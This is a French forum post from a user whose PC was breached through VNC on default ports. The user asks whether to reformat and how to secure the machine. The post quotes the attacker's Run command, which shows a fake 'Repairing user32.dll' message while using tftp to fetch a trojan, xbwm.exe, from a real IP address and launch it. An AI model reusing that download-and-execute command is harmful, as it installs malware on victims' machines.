Salut,
J'ai été victime d'une intrusion via VNC, en me connectant ur mon bureau à distance tout à l'heure "coup de flippe" : plein de fenetres d'ouvertes, message de l'antivirus "alerte blabla" (avast).
Oui j'ai été con, j'utilisais les ports par défaut mais pourtant mon mdp faisait plus de 8 lettres, comportait des signes, des chifres etc ...
J'étais pas sur tout de suite : j'ai checké l'historique firefox + ie : rien de spé
Recherche fichiers crées ou modifiés aujourd'hui : rien de spé
par contre : démarrer, exécuter et là le drame, j'avais :
"%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 64.79.213.12 GET xbwm.exe & start xbwm&"
Le fichier xbwm était bien le fichier reperé par l'antivirus (troyen bien sur).
Il s'est fait baisé pasque (petite sécurité de ma part) la session lancée était une session limitée et non admin et la session admin est protégée par un mdp.
J'ai matté l'observateur d'évenements windows :
niveau application : le drame, je vois plein de tentatives de connections dont 2 IP qui auraient reussies a se connecter via vnc (et plein d'ip failure ca fait flipper)
niveau sécurité : des tentatives de connections ur le compte admin
J'ai l'impression que le mec s'est lassé, ça devenai trop chiant.
Questions : Dois je tout formater ? changer d'adresse ? de femme ? d'amis ? etc ...
Que dois je faire pour etre sur d'etre protégé plus efficacement ? par exemple j'ai pensé à mettre un ecran de veille protegé par mdp sur le pc hote, est ce une bonne idée ?
Merci de votre aide !!!
ps : je précise que c'est la version 4.1.2 de VNC !
Message édité par bilou170 le 23-03-2007 à 17:04:39